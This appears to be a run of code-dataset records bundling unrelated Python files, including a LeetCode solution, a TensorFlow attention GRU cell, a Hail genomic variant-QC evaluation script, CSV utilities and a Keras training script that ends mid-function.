df2.loc[i]['publisher'], df2.loc[i]['url'], df2.loc[i]['id_citations'], df2.loc[i]['id_scholarcitedby'], df2.loc[i]['source'], df2.loc[i]['citedByUrl']], index=update.columns), ignore_index=True)\n\ntoday = datetime.today().strftime('%Y%m%d')\nfilename = \"update_\" + today + \".csv\"\nprint(\"Done. Saving to file... \" + filename)\nupdate.to_csv(filename,index=False)\n\n\n","sub_path":"diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"172047724","text":"## https://leetcode.com/problems/odd-even-linked-list/submissions/\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def oddEvenList(self, head: ListNode) -> ListNode:\n\n \n if head == None or head.next == None :\n return head\n \n Odd_head = head\n Even_head = head.next\n \n odd_temp = head\n even_temp = head.next\n \n while odd_temp.next and even_temp.next:\n \n if Even_head.next == None:\n return Odd_head\n break\n \n odd_temp.next = even_temp.next\n odd_temp = odd_temp.next\n \n even_temp.next = odd_temp.next\n even_temp = even_temp.next\n \n odd_temp.next = Even_head\n \n return Odd_head\n ","sub_path":"Leetcode/Medium/Odd even linked list.py","file_name":"Odd even linked list.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"652704915","text":"import random\nfrom math import pi, sin, cos\n\n\"\"\"Your job is to create better version of create_expression and\nrun_expression to create random art.\nYour expression should have a __str__() function defined for it.\"\"\"\n\nclass Expression:\n def __init__(self):\n self.commands = []\n\n def evaluate(self, x, y):\n value = 1\n for (command, coord) in self.commands:\n if command == \"one\" and coord == \"x\":\n value = pi * cos(pi * sin(pow(x, 2)))\n elif command == \"one\" and coord == \"y\":\n value = pi * sin(pi * cos(pow(y, 4)))\n elif command == \"two\" and coord == \"x\":\n value *= pow(cos(pi * x), 2)\n elif command == \"two\" and coord == \"y\":\n value *= cos(pi * y)\n elif command == \"three\" and coord == \"x\":\n value *= sin(pi * sin(pi * x))\n elif command == \"three\" and coord == \"y\":\n value *= sin(pi * sin(pi * y))\n\n return value\n\n def __str__(self):\n return str(self.commands)\n\ndef create_expression():\n \"\"\"This function takes no arguments and returns an expression that\n generates a number between -1.0 and 1.0, given x and y coordinates.\"\"\"\n #expr = lambda x, y: sin(x)\n #return expr\n\n expr = Expression()\n for _ in range(12):\n if random.random() > 0.5:\n x_or_y = \"x\"\n else:\n x_or_y = \"y\"\n\n if random.random() > 0.7:\n operator = \"one\"\n elif random.random() < 0.3:\n operator = \"two\"\n else:\n operator = \"three\"\n\n expr.commands.append([operator, x_or_y])\n\n return expr\n\n\n\ndef run_expression(expr, x, y):\n \"\"\"This function takes an expression created by create_expression and\n an x and y value. 
It runs the expression, passing the x and y values\n to it and returns a value between -1.0 and 1.0.\"\"\"\n return expr.evaluate(x, y)\n","sub_path":"random_art.py","file_name":"random_art.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"352847102","text":"import Levenshtein\n\nCUTOFF = 0.6\n\n# https://maxbachmann.github.io/Levenshtein/levenshtein.html\n# https://en.m.wikipedia.org/wiki/Levenshtein_distance\n# Normalized similarity is documented as (1 - normalized distance).\n# Normalized distance seems to be (raw_distance / combined length) * 2\ndef is_similar(string_a, string_b):\n if string_a == string_b: # shortcut\n return True\n return Levenshtein.ratio(string_a, string_b, score_cutoff=CUTOFF) > CUTOFF\n\n\ndef first_unknown(consider, history, match=is_similar):\n for candidate in consider:\n for past in history:\n if match(candidate, past):\n break # out of inner for loop\n else: # executed after loop if no break\n return candidate\n","sub_path":"api/similar.py","file_name":"similar.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"52147044","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 22 14:18:03 2020\n\n@author: Laura.Fiorentino\n\"\"\"\nimport csv\nimport itertools\n\ndef read_ssp(filename):\n variables = []\n ssp_dict = {}\n with open(filename) as file:\n for line in file:\n line_split = line.split(',')\n if len(line_split) < 3:\n continue\n new_variable = line_split[2]\n if new_variable in variables:\n ssp_dict[new_variable].append(line_split[3])\n ssp_dict[new_variable + '_time'].append(line_split[0]\n + ' ' + line_split[1])\n else:\n variables.append(new_variable)\n ssp_dict[new_variable + '_time'] = []\n ssp_dict[new_variable] = []\n ssp_dict[new_variable].append(line_split[3])\n ssp_dict[new_variable + '_time'].append(line_split[0]\n + ' ' + line_split[1])\n return ssp_dict\n\n\ndef write_csv(ssp_dict, new_filename):\n \"\"\" This function writes thew new csv file. Each column is a time then the\n corresponding variable\"\"\"\n with open(new_filename, 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(ssp_dict.keys())\n writer.writerows(itertools.zip_longest(*ssp_dict.values()))\n \ndef ssp2csv(logfile, csvfile):\n ssp_dict = read_ssp(logfile)\n write_csv(ssp_dict, csvfile)","sub_path":"ssp_fxns.py","file_name":"ssp_fxns.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"505660116","text":"# coding: utf-8\nimport tensorflow as tf\n\nclass Att_mGRUcell(object):\n def __init__(self, input, premise, d_input, d_premise, d_cell, d_att, initializer, l2=False, init_h=None):\n # var\n self.input = input # shape: [n_steps, n_samples, d_input],输入前对原始数据进行了变化处理\n self.premise = premise\n self.d_input = d_input\n self.d_premise = d_premise\n self.d_cell = d_cell\n self.d_att = d_att\n self.initializer = initializer\n\n self.type = 'gru' # Just for the using of 'tf.scan'\n\n if init_h is None: # 判断是否提供了hidden_state的初始值\n # the shape of init_h is [n_samples, d_cell]\n self.init_h = tf.matmul(self.input[0, :, :], tf.zeros([self.d_input, self.d_cell]))\n self.previous = self.init_h # initial state\n\n # parameters, each of which has W_x W_h b\n self.rgate = self.Gate()\n self.zgate = self.Gate()\n self.hh = self.Gate()\n\n # to speed up computation. 
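        # Fusing the per-gate parameters means one matmul yields all three gate\n        # pre-activations, which Slice_W below splits apart again. Shapes: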
W_x: [d_input+d_premise, 3*d_cell], W_h: [d_cell, 3*d_cell], b: [3*d_cell,]\n # W_x = [W_xr, W_xz, W_xc]\n # W_h = [W_hr, W_hz, W_hc]\n # b = ( [b_r.T, b_z.T, b_c.T] ).T\n self.W_x = tf.concat([self.rgate[0], self.zgate[0], self.hh[0]], axis=1) # 按行对齐\n self.W_h = tf.concat([self.rgate[1], self.zgate[1], self.hh[1]], axis=1)\n self.b = tf.concat([self.rgate[2], self.zgate[2], self.hh[2]], axis=0) # 按列对齐\n\n # Query weight\n self.W_c = tf.get_variable('W_c', [self.d_input, self.d_att], tf.float32)\n\n # Attention weights(additive attention)\n self.v = tf.get_variable('v', [self.d_att], tf.float32)\n self.W_q = tf.get_variable('W_q', [self.d_att, self.d_att], tf.float32)\n self.W_k = tf.get_variable('W_k', [self.d_premise, self.d_att], tf.float32)\n self.W_m = tf.get_variable('W_m', [self.d_cell, self.d_att], tf.float32)\n\n if l2:\n lst_W = [self.W_x, self.W_h, self.W_c, self.W_q, self.W_k, self.W_m]\n self.l2_loss = tf.add_n([tf.nn.l2_loss(v) for v in lst_W]) * 1e-4\n\n def Gate(self, bias=0.001):\n # Since we will use gate multiple times, let's code a class for reusing\n Wx = self.initializer([self.d_input + self.d_premise, self.d_cell])\n Wh = self.initializer([self.d_cell, self.d_cell])\n b = tf.Variable(tf.constant(bias, shape=[self.d_cell]), trainable=True)\n return Wx, Wh, b\n\n def Slice_W(self, W, n):\n # split W's after computing\n return W[:, n * self.d_cell: (n + 1) * self.d_cell] # 选取给定输入的特定列\n\n def Step(self, prev_h, current_state_right):\n # Query vector, [-1, n_hidden], based on the state_right\n q = tf.nn.tanh(tf.matmul(current_state_right, self.W_c))\n\n # Attention weights(additive attention), based on premise, q and the preceding hidden state of mLSTM\n temp = tf.nn.tanh(tf.expand_dims(tf.tensordot(q, self.W_q, axes=1), axis=1)\n + tf.tensordot(self.premise, self.W_k, axes=1)\n + tf.expand_dims(tf.tensordot(prev_h, self.W_m, axes=1), axis=1))\n scores = tf.tensordot(temp, self.v, axes=1) # [-1, seq_length, d_att] 'dot' [d_att,] => [-1, seq_length]\n alphas = tf.nn.softmax(scores) # [-1, seq_length]\n\n # Context vector, weighted-sum by the second dim\n context = tf.reduce_sum(self.premise * tf.expand_dims(alphas, axis=2), axis=1) # [-1, d_premise]\n\n current_x = tf.concat([context, current_state_right], axis=1) # the input of mLSTM, [-1, d_input+d_premise]\n\n # computing all gates, 包含四个子网络的结果\n states_x = tf.matmul(current_x, self.W_x) + self.b # [-1, 3*d_cell]\n states_h = tf.matmul(prev_h, self.W_h)\n\n # computing (4steps)\n r = tf.nn.sigmoid(self.Slice_W(states_x, 0) + self.Slice_W(states_h, 0)) # [-1, d_cell]\n z = tf.nn.sigmoid(self.Slice_W(states_x, 1) + self.Slice_W(states_h, 1))\n hh = tf.nn.tanh(self.Slice_W(states_x, 2) + r * self.Slice_W(states_h, 2)) # [-1, d_cell]\n current_h = (1-z) * prev_h + z * hh\n return current_h","sub_path":"Att_mGRUcell.py","file_name":"Att_mGRUcell.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"188592044","text":"#!/usr/bin/env python\n\n\"\"\"\nEvaluate random forest and VQSR results against the truth data\n\"\"\"\n\nfrom os.path import join\nfrom typing import Optional\nimport logging\nfrom pprint import pformat\nimport click\nimport hail as hl\n\nfrom gnomad.utils.filtering import filter_to_clinvar_pathogenic\nfrom gnomad.variant_qc.evaluation import (\n compute_binned_truth_sample_concordance,\n compute_grouped_binned_ht,\n create_truth_sample_ht,\n)\nfrom gnomad.variant_qc.pipeline import create_binned_ht, 
score_bin_agg\n\nfrom joint_calling.utils import get_validation_callback\nfrom joint_calling import utils, resources\nfrom joint_calling import _version\n\nlogger = logging.getLogger('random_forest')\nlogger.setLevel('INFO')\n\n\n@click.command()\n@click.version_option(_version.__version__)\n@click.option(\n '--mt',\n 'mt_path',\n callback=get_validation_callback(ext='mt'),\n help='Path to the matrix table',\n)\n@click.option(\n '--rf-annotations-ht',\n 'rf_annotations_ht_path',\n callback=get_validation_callback(ext='ht'),\n help='RF annotations table (created by random_forest.py)',\n)\n@click.option(\n '--info-split-ht',\n 'info_split_ht_path',\n required=True,\n callback=get_validation_callback(ext='ht', must_exist=True),\n help='path to info Table with split multiallelics '\n '(generated by generate_info_ht.py --out-split-info-ht)',\n)\n@click.option(\n '--fam-stats-ht',\n 'fam_stats_ht_path',\n callback=get_validation_callback(ext='ht'),\n help='optional path to a Table with trio stats '\n '(generated by generate_variant_qc_annotations.py)',\n)\n@click.option(\n '--rf-result-ht',\n 'rf_result_ht_path',\n callback=get_validation_callback(ext='ht'),\n help='RF result table (created by random_forest.py)',\n)\n@click.option(\n '--vqsr-filters-split-ht',\n 'vqsr_filters_split_ht_path',\n callback=get_validation_callback(ext='ht'),\n help='Use VQSR training sites to train the RF (generated by load_vqsr.py)',\n)\n@click.option(\n '--out-bin-ht',\n 'out_bin_ht_path',\n required=True,\n help='When set, creates file annotated with bin based on rank of VQSR/RF score.',\n)\n@click.option(\n '--out-aggregated-bin-ht',\n 'out_aggregated_bin_ht_path',\n help='When set, creates a file with aggregate counts of variants based on bins.',\n)\n@click.option(\n '--run-sanity-checks',\n 'run_sanity_checks',\n is_flag=True,\n help='When set, runs ranking sanity checks.',\n)\n@click.option(\n '--n-bins',\n 'n_bins',\n help='Number of bins for the binned file (default: 100).',\n default=100,\n type=click.INT,\n)\n@click.option(\n '--n-partitions',\n 'n_partitions',\n type=click.INT,\n help='Desired base number of partitions for output tables',\n default=5000,\n)\n@click.option(\n '--bucket',\n 'work_bucket',\n required=True,\n help='path to write intermediate output and checkpoints. '\n 'Can be a Google Storage URL (i.e. 
start with `gs://`).',\n)\n@click.option(\n '--local-tmp-dir',\n 'local_tmp_dir',\n help='local directory for temporary files and Hail logs (must be local).',\n)\n@click.option(\n '--overwrite/--reuse',\n 'overwrite',\n is_flag=True,\n help='if an intermediate or a final file exists, skip running the code '\n 'that generates it.',\n)\ndef main( # pylint: disable=too-many-arguments,too-many-locals\n mt_path: str,\n rf_annotations_ht_path: Optional[str],\n info_split_ht_path: str,\n fam_stats_ht_path: str,\n rf_result_ht_path: Optional[str],\n vqsr_filters_split_ht_path: Optional[str],\n out_bin_ht_path: str,\n out_aggregated_bin_ht_path: str,\n run_sanity_checks: bool,\n n_bins: int,\n n_partitions: int,\n work_bucket: str,\n local_tmp_dir: str,\n overwrite: bool,\n): # pylint: disable=missing-function-docstring\n local_tmp_dir = utils.init_hail('variant_qc_evaluate', local_tmp_dir)\n\n if overwrite or not utils.file_exists(out_bin_ht_path):\n scores_ht = create_bin_ht(\n rf_annotations_ht=hl.read_table(rf_annotations_ht_path),\n info_split_ht=hl.read_table(info_split_ht_path),\n n_bins=n_bins,\n rf_results_ht=hl.read_table(rf_result_ht_path)\n if rf_result_ht_path\n else None,\n vqsr_filters_split_ht=hl.read_table(vqsr_filters_split_ht_path)\n if vqsr_filters_split_ht_path\n else None,\n )\n scores_ht = scores_ht.checkpoint(out_bin_ht_path, overwrite=True)\n else:\n scores_ht = hl.read_table(out_bin_ht_path)\n\n if run_sanity_checks:\n logger.info('Running sanity checks...')\n ht = scores_ht\n logger.info(\n ht.aggregate(\n hl.struct(\n was_biallelic=hl.agg.counter(~ht.was_split),\n has_biallelic_rank=hl.agg.counter(hl.is_defined(ht.biallelic_bin)),\n was_singleton=hl.agg.counter(ht.singleton),\n has_singleton_rank=hl.agg.counter(hl.is_defined(ht.singleton_bin)),\n was_biallelic_singleton=hl.agg.counter(\n ht.singleton & ~ht.was_split\n ),\n has_biallelic_singleton_rank=hl.agg.counter(\n hl.is_defined(ht.biallelic_singleton_bin)\n ),\n )\n )\n )\n\n if out_aggregated_bin_ht_path:\n if overwrite or not utils.file_exists(out_aggregated_bin_ht_path):\n logger.warning('Use only workers, it typically crashes with preemptibles')\n agg_ht = create_aggregated_bin_ht(\n ht=scores_ht,\n trio_stats_ht=hl.read_table(fam_stats_ht_path)\n if fam_stats_ht_path\n else None,\n work_bucket=work_bucket,\n )\n agg_ht.write(out_aggregated_bin_ht_path, overwrite=True)\n\n mt = utils.get_mt(mt_path)\n\n truth_gvcfs = dict(\n syndip=dict(\n s='syndip',\n gvcf='gs://cpg-reference/validation/syndip/truth/full.38.20180222.vcf.gz',\n ),\n NA12878=dict(\n s='NA12878',\n gvcf='gs://cpg-reference/validation/giab/truth/HG001_GRCh38_GIAB_highconf_CG-IllFB-IllGATKHC-Ion-10X-SOLID_CHROM1-X_v.3.3.2_highconf_PGandRTGphasetransfer.vcf.gz',\n ),\n )\n\n truth_dict = {\n truth_gvcfs['syndip']['s']: {\n 's': truth_gvcfs['syndip']['s'],\n 'truth_mt': hl.read_matrix_table(\n 'gs://cpg-reference/validation/syndip/truth/syndip.b38_20180222.mt'\n ),\n 'hc_intervals': hl.read_table(\n 'gs://cpg-reference/validation/syndip/regions/syndip_b38_20180222_hc_regions.ht'\n ),\n 'mt': None,\n 'ht': None,\n },\n truth_gvcfs['NA12878']['s']: {\n 's': truth_gvcfs['NA12878']['s'],\n 'truth_mt': hl.read_matrix_table(\n 'gs://cpg-reference/validation/giab/truth/HG001_GRCh38_GIAB_highconf_CG-IllFB-IllGATKHC-Ion-10X-SOLID_CHROM1-X_v.3.3.2_highconf_PGandRTGphasetransfer.mt'\n ),\n 'hc_intervals': hl.read_table(\n 
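                # GIAB high-confidence region intervals for NA12878: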
'gs://cpg-reference/validation/giab/regions/HG001_GRCh38_GIAB_highconf_CG-IllFB-IllGATKHC-Ion-10X-SOLID_CHROM1-X_v.3.3.2_highconf_nosomaticdel_noCENorHET7_hc_regions.ht'\n ),\n 'mt': None,\n 'ht': None,\n },\n }\n\n truth_snames = [sn for sn in truth_gvcfs if sn in mt.s.collect()]\n if truth_snames:\n truth_dict = {k: v for k, v in truth_dict.items() if k in truth_snames}\n _truth_concordance(\n mt,\n overwrite,\n work_bucket,\n n_partitions,\n scores_ht,\n info_split_ht_path,\n n_bins,\n truth_dict,\n )\n\n\ndef _truth_concordance(\n mt,\n overwrite,\n work_bucket,\n n_partitions,\n scores_ht,\n info_split_ht_path,\n n_bins,\n truth_dict,\n):\n logger.info(f'Extracting truth samples from MT...')\n mt = mt.filter_cols(\n hl.literal([v['s'] for k, v in truth_dict.items()]).contains(mt.s)\n )\n mt = hl.experimental.sparse_split_multi(mt, filter_changed_loci=True)\n\n # Checkpoint to prevent needing to go through the large table a second time\n checkpoint_mt_path = join(work_bucket, 'tmp', 'genomes_split.mt')\n logger.info(f'Saving checkpoint to {checkpoint_mt_path}')\n mt = mt.checkpoint(checkpoint_mt_path, overwrite=overwrite)\n\n for truth_sample, truth_data in truth_dict.items():\n truth_samples_mt_path = join(work_bucket, 'truth_samples', f'{truth_sample}.mt')\n if not overwrite and utils.file_exists(truth_samples_mt_path):\n truth_data['mt'] = hl.read_matrix_table(truth_samples_mt_path)\n else:\n called_truth_mt = mt.filter_cols(mt.s == truth_dict[truth_sample]['s'])\n # Filter to variants in truth data\n called_truth_mt = called_truth_mt.filter_rows(\n hl.agg.any(called_truth_mt.GT.is_non_ref())\n )\n logger.info(\n f'Saving {truth_sample} called truth sample data to '\n f'{truth_samples_mt_path}'\n )\n called_truth_mt = called_truth_mt.naive_coalesce(n_partitions)\n called_truth_mt.write(truth_samples_mt_path, overwrite=True)\n truth_data['mt'] = called_truth_mt\n\n for truth_sample, truth_data in truth_dict.items():\n # Merging with truth data. Computes a table for each truth sample comparing\n # the truth sample in the callset vs the truth.\n truth_ht_path = join(work_bucket, 'truth_samples', f'{truth_sample}.ht')\n if not overwrite and utils.file_exists(truth_ht_path):\n truth_data['ht'] = hl.read_table(truth_ht_path)\n else:\n logger.info(\n f'Creating a merged table with callset truth sample and truth data '\n f'for {truth_sample}...'\n )\n\n # Load truth data\n mt = truth_data['mt']\n truth_hc_intervals = truth_data['hc_intervals']\n truth_mt = truth_data['truth_mt']\n truth_mt = truth_mt.key_cols_by(s=hl.str(truth_data['s']))\n\n # Remove low quality sites\n info_ht = hl.read_table(info_split_ht_path)\n mt = mt.filter_rows(~info_ht[mt.row_key].AS_lowqual)\n\n ht = create_truth_sample_ht(mt, truth_mt, truth_hc_intervals)\n ht.write(truth_ht_path, overwrite=True)\n truth_data['ht'] = ht\n\n # Bin truth sample concordance. 
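    # (A \"bin\" here is a rank-based slice of the model score, as computed by\n    # create_bin_ht above.)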
Merges concordance results (callset vs.\n # truth) for a given truth sample with bins from specified model\n logger.info(f'Creating binned concordance table for {truth_sample}')\n info_ht = hl.read_table(info_split_ht_path)\n ht = truth_dict[truth_sample]['ht']\n ht = ht.filter(\n ~info_ht[ht.key].AS_lowqual\n & ~hl.is_defined(hl.read_table(resources.TEL_AND_CENT_HT)[ht.locus])\n )\n\n logger.info('Filtering out low confidence regions and segdups...')\n lcr = hl.read_table(resources.LCR_INTERVALS_HT)\n segdup = hl.read_table(resources.SEG_DUP_INTERVALS_HT)\n ht = ht.filter(hl.is_missing(lcr[ht.locus]))\n ht = ht.filter(hl.is_missing(segdup[ht.locus]))\n\n logger.info(\n 'Loading HT containing RF or VQSR scores annotated with a bin based '\n 'on the rank of score...'\n )\n metric_ht = scores_ht\n ht = ht.filter(hl.is_defined(metric_ht[ht.key]))\n\n ht = ht.annotate(score=metric_ht[ht.key].score)\n\n ht = compute_binned_truth_sample_concordance(ht, metric_ht, n_bins)\n binned_concordance_ht_path = join(\n work_bucket,\n 'binned_concordance',\n f'{truth_sample}_binned_concordance.ht',\n )\n ht.write(binned_concordance_ht_path, overwrite=True)\n\n\ndef create_bin_ht(\n rf_annotations_ht: hl.Table,\n info_split_ht: hl.Table,\n n_bins: int,\n rf_results_ht: Optional[hl.Table] = None,\n vqsr_filters_split_ht: Optional[hl.Table] = None,\n) -> hl.Table:\n \"\"\"\n Creates a table with bin annotations added for a RF or VQSR run and writes it\n to its correct location in annotations.\n\n :param rf_annotations_ht: table generated by create_rf_annotations.py\n :param info_split_ht: table generated by generate_info_ht.py\n :param n_bins: Number of bins to bin the data into\n :param rf_results_ht: table generated by random_forest.py\n :param vqsr_filters_split_ht: table generated by load_vqsr.py\n :return: Table with bin annotations\n \"\"\"\n logger.info(f'Annotating model HT with bins using {n_bins} bins')\n if vqsr_filters_split_ht:\n logger.info(f'Using a VQSR model')\n\n ht = vqsr_filters_split_ht\n ht = ht.annotate(**rf_annotations_ht[ht.key])\n ht = ht.annotate(\n info=info_split_ht[ht.key].info,\n score=ht.info.AS_VQSLOD,\n positive_train_site=ht.info.POSITIVE_TRAIN_SITE,\n negative_train_site=ht.info.NEGATIVE_TRAIN_SITE,\n AS_culprit=ht.info.AS_culprit,\n )\n\n # Remove all samples with an undefined ac_raw, because ac_raw was\n # calculated on the high quality samples only, and VQSR was run before\n # sample filtering\n ht = ht.filter(hl.is_defined(ht.ac_raw))\n\n else:\n logger.info(f'Using an RF model')\n ht = rf_results_ht\n ht = ht.annotate(\n info=info_split_ht[ht.key].info,\n positive_train_site=ht.tp,\n negative_train_site=ht.fp,\n score=ht.rf_probability['TP'],\n )\n\n ht = ht.filter(\n ~info_split_ht[ht.key].AS_lowqual\n & ~hl.is_defined(hl.read_table(resources.TEL_AND_CENT_HT)[ht.locus])\n )\n ht_non_lcr = resources.filter_low_conf_regions(\n ht,\n filter_lcr=True,\n filter_segdup=True,\n )\n ht = ht.annotate(non_lcr=hl.is_defined(ht_non_lcr[ht.key]))\n bin_ht = create_binned_ht(ht, n_bins, add_substrat={'non_lcr': ht.non_lcr})\n return bin_ht\n\n\ndef create_aggregated_bin_ht(\n ht: hl.Table,\n trio_stats_ht: Optional[hl.Table],\n work_bucket: str,\n) -> hl.Table:\n \"\"\"\n Aggregates variants into bins, grouped by `bin_id` (rank, bi-allelic, etc.),\n contig, and `snv`, `bi_allelic`, and `singleton` status, using previously\n annotated bin information.\n\n For each bin, aggregates statistics needed for evaluation plots.\n :param ht: table with score bins\n :param trio_stats_ht: 
optional, HT generated from a FAM file\n :param work_bucket: bucket to write temporary files to\n :return: Table of aggregate statistics by bin\n \"\"\"\n\n # Count variants for ranking\n count_expr = {\n x: hl.agg.filter(\n hl.is_defined(ht[x]),\n hl.agg.counter(\n hl.cond(hl.is_snp(ht.alleles[0], ht.alleles[1]), 'snv', 'indel')\n ),\n )\n for x in ht.row\n if x.endswith('bin')\n }\n bin_variant_counts = ht.aggregate(hl.struct(**count_expr))\n logger.info(f'Found the following variant counts:\\n {pformat(bin_variant_counts)}')\n ht = ht.annotate_globals(bin_variant_counts=bin_variant_counts)\n\n # Load ClinVar pathogenic data\n clinvar_ht = hl.read_table(resources.CLINVAR_HT)\n clinvar_pathogenic_ht = filter_to_clinvar_pathogenic(clinvar_ht)\n ht = ht.annotate(clinvar_pathogenic=hl.is_defined(clinvar_pathogenic_ht[ht.key]))\n\n logger.info(f'Creating grouped bin table...')\n checkpoint_path = join(work_bucket, 'tmp', f'grouped_bin.ht')\n grouped_binned_ht = compute_grouped_binned_ht(ht, checkpoint_path=checkpoint_path)\n\n logger.info(f'Aggregating grouped bin table...')\n # Getting the source Table of the GroupedTable object\n # (\"parent\" here has nothing to do with the pedigree!)\n parent_ht = grouped_binned_ht._parent # pylint: disable=protected-access\n\n agg_ht = grouped_binned_ht.aggregate(\n n_clinvar_pathogenic=hl.agg.count_where(parent_ht.clinvar_pathogenic),\n **score_bin_agg(\n grouped_binned_ht,\n fam_stats_ht=trio_stats_ht,\n clinvar=clinvar_ht,\n truth_data=resources.get_truth_ht(),\n ),\n )\n return agg_ht\n\n\nif __name__ == '__main__':\n main() # pylint: disable=E1120\n","sub_path":"scripts/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":16283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"395372744","text":"import\timportlib,\\\r\n\t\timportlib.util,\\\r\n\t\tos,\\\r\n\t\tsys,\\\r\n\t\ttime,\\\r\n\t\t\\\r\n\t\tCoreLib\r\n\r\ndef importDay(dayNum):\r\n\tmodName = 'Day{0}'.format(dayNum)\r\n\tmodSpec = importlib.util.spec_from_file_location(modName, '{0}/Days/{1}.py'.format(os.path.abspath(os.getcwd()), modName))\r\n\tdayMod = importlib.util.module_from_spec(modSpec)\r\n\tmodSpec.loader.exec_module(dayMod)\r\n\treturn getattr(dayMod, modName)()\r\n\r\ndef main(args):\r\n\t# Determine which days were requested to test.\r\n\tdayNumsToRun = args\r\n\tnumLoops = 100\r\n\tif (len(dayNumsToRun) == 0):\r\n\t\tdayNumsToRun = [i for i in range(1, 13)]\r\n\tdays = [importDay(int(day)) for day in dayNumsToRun]\r\n\r\n\t# Run the tests.\r\n\tprint('Running all tests {0} times:'.format(numLoops))\r\n\tavgTimeMS = 0\r\n\tfor day in days:\r\n\t\tavgTimeMS += day.RunTests(numLoops)\r\n\tprint('Average Total Elapsed: {0:.4f} ms'.format(avgTimeMS))\r\n\r\nif __name__ == '__main__':\r\n\tfileDir = os.path.dirname(os.path.abspath(__file__))\r\n\tcwd = os.path.abspath(os.getcwd())\r\n\tif fileDir != cwd:\r\n\t\traise AssertionError('This script\\'s working directory must be the directory where Main.py is. 
File path is currently {0} and working directory is {1}'.format(fileDir, cwd))\r\n\tmain(sys.argv[1:])","sub_path":"2020/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"378976633","text":"import csv\r\n\r\ndef write_into_csv(info_list):\r\n with open('stud_info.csv','a', newline='') as csv_file:\r\n writer = csv.writer(csv_file)\r\n if csv_file.tell() == 0:\r\n writer.writerow([\"Name \",\"Age \",\"Mob_no \",\"Email \"])\r\n\r\n writer.writerow(info_list)\r\nif __name__ == '__main__':\r\n condition = True\r\n stud_num = 1\r\n while(condition):\r\n stud_info = input(\"Enter the Information for Student{} in following format (Name Age Mob_no Email ) \".format(stud_num))\r\n print(\"Following Information saved succesfully \" + stud_info)\r\n\r\n #split\r\n stud_info_list = stud_info.split(\" \")\r\n print(\"Entered Split up Information \" + str(stud_info_list))\r\n\r\n print(\"\\nThe Entered Information is - \\n Name: {} \\n Age:{} \\n Mob_no: {} \\n Email: {} \"\r\n .format(stud_info_list[0],stud_info_list[1],stud_info_list[2],stud_info_list[3]))\r\n choice_check = input(\"Is the entered information correct ? (yes/no) : \")\r\n\r\n if choice_check == \"yes\":\r\n write_into_csv(stud_info_list)\r\n cond_check = input(\"Enter 'yes'/'no' if You want to enter another student's data : \")\r\n if cond_check == \"yes\":\r\n condition = True\r\n stud_num = stud_num + 1\r\n elif cond_check == \"no\":\r\n condition = False\r\n elif choice_check == \"no\":\r\n print(\"Please Re-enter the information ! \")\r\n","sub_path":"school admistration project/univ_admin.py","file_name":"univ_admin.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"9148367","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nimport math\nimport sys\nimport numpy as np\nimport os\nimport nn_utils.network_utils as network_utils\nimport utils.config.nn_config as nn_config\nfrom keras.models import load_model\nfrom keras.callbacks import LearningRateScheduler\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.utils.visualize_util import plot\n\nglobal cur_iter\nconfig = nn_config.get_neural_net_configuration(int(sys.argv[1]))\nfreq = config['samplerate']\nbatch_size = config['batch_size']\t#Number of training examples pushed to the GPU per batch.\ninputFile = config['dataset_file']\ncur_iter = sys.argv[2]\nmodelweight_dir = config['modelweight_dir']\nmodel_filename = '%s/%s_%s_%s' % (\n\tmodelweight_dir,\n\tconfig['hidden_dimension_size'],\n\tconfig['recurrent_units'],\n\tconfig['dataset_name'])\n\nnum_iters = 10000\t\t\t\t\t#Number of iterations for training\nepochs_per_iter = 20\t\t\t\t#Number of iterations before we save our model\n\ndef loadData():\n\t#X_train is a tensor of size (num_train_examples, num_timesteps, num_frequency_dims)\n\t#Y_train is a tensor of size (num_train_examples, num_timesteps, num_frequency_dims)\n\tX_train = np.load(config['dataset_file'] + '_x.npy')\n\tY_train = np.load(config['dataset_file'] + '_y.npy')\n\tprint('Training data shape:')\n\tprint(X_train.shape)\n\tif(config['stateful']):\n\t\tprint('The network model you are loading the data for is set to be stateful.')\n\t\tlength = int(X_train.shape[0] / float(batch_size)) * batch_size\n\t\tX_train = X_train[len(X_train)-length:]\n\t\tY_train = Y_train[len(Y_train)-length:]\n\treturn 
